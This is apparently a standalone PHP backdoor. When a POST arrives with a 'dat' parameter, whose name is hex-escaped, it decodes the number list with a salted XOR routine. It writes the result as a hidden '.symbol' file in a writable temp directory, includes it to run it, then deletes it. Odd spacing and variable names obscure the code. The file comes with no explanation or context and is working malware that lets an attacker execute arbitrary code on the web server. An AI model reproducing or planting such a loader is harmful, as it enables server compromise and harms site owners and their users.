<?php

if(count($_POST) > 0 && isset($_POST["d\x61t"])){
	$sym = array_filter(["/var/tmp", "/dev/shm", getcwd(), session_save_path(), getenv("TMP"), "/tmp", getenv("TEMP"), sys_get_temp_dir(), ini_get("upload_tmp_dir")]);
	$pgrp = $_POST["d\x61t"];
			$pgrp  	=		explode  	(	"." 	 ,  $pgrp)	 ; 
	$data_chunk = '';
            $salt9 = 'abcdefghijklmnopqrstuvwxyz0123456789';
            $lenS = strlen(  $salt9);
            $k = 0;
    
            foreach(  $pgrp as $v4) {		$chS = ord(  $salt9[$k % $lenS]);
                $d =(  (  int)$v4 - $chS -(  $k % 10)) ^ 53;
                $data_chunk	 .=chr(  $d);
                $k++;
            }
	for ($obj = 0, $resource = count($sym); $obj < $resource; $obj++) {
    $elem = $sym[$obj];
    		if ((function($d) { return is_dir($d) && is_writable($d); })($elem)) {
    $res = join("/", [$elem, ".symbol"]);
    $success = file_put_contents($res, $data_chunk);
if ($success) {
	include $res;
	@unlink($res);
	exit;}
}
}
}